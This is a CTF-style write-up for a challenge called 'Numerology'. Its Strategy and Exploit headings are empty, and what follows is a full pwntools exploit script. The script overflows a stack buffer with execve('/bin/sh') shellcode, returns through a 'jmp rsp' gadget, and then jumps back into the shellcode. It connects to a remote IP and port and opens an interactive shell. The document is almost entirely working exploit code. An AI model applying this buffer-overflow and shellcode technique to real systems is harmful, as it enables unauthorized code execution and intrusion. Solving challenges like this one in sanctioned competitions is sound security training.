Numerology

Strategy

Exploit

#!/usr/bin/env python3

from pwn import *

exe = ELF("./numerology")
context.log_level = 'info'
args.LOCAL=False
args.DEBUG=True
context.binary = exe


def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.DEBUG:
            gdb.attach(r,gdbscript="""
    
        
        
       """)
    else:
        r = remote("143.255.251.233", 13373)

    return r


def main():
    #0x000000000040119e : jmp rsp # ROP to JMP RSP for Execute our Shellcode
    offjmp4 = 0x72 # Offset JMP to JMP from our Stack pos to the position of the Shellcode
    shell=b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05' #Shellcode
    
    offset=36-len(shell) # 36 is our Overflow, So this takes Shell - 36 to add PAD
    
    r = conn()
    
    r.sendline(b'A'*offset + shell + p64(0x000000000040119e) +asm('jmp $-'+hex(offjmp4)))

    r.interactive()


if __name__ == "__main__":
    main()